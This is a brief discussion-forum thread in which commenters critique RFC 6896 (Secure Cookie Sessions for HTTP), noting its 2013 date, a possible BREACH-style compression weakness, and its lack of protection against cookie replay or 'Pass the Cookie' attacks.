
RFC 6896 – Secure Cookie Sessions for HTTP - dedalus
https://tools.ietf.org/html/rfc6896
======
kpcyrd
It seems this has all disadvantages of jwt-style sessions, plus a BREACH-style
vulnerability in the crypto due to compression if `plain-text-cookie-value`
contains data an attacker can taint.

~~~
tptacek
Yeah, I'm pretty confused by this being on the front page.

------
jamieson-becker
@moderators should probably be marked [2013]

------
chrismorgan
A better title:

RFC 6896 - SCS: KoanLogic's Secure Cookie Sessions for HTTP [2013]

~~~
jedisct1
A better better title: RFC 6896 - SCS: KoanLogic's Insecure Cookie Sessions
for HTTP [2013]

------
kerng
This doesn't seem to protect from Pass the Cookie attacks.

Edit - it's a common red teaming tactic:
[https://wunderwuzzi23.github.io/blog/passthecookie.html](https://wunderwuzzi23.github.io/blog/passthecookie.html)

~~~
0xfffff
Correct, it doesn't. If you grab that cookie and then pass the cookie from
somewhere else it will work.

Section 7.2.3 talks about cookie theft.

~~~
kerng
Yeah, as others have pointed out this RFC is from 2013 - so a bit dated.

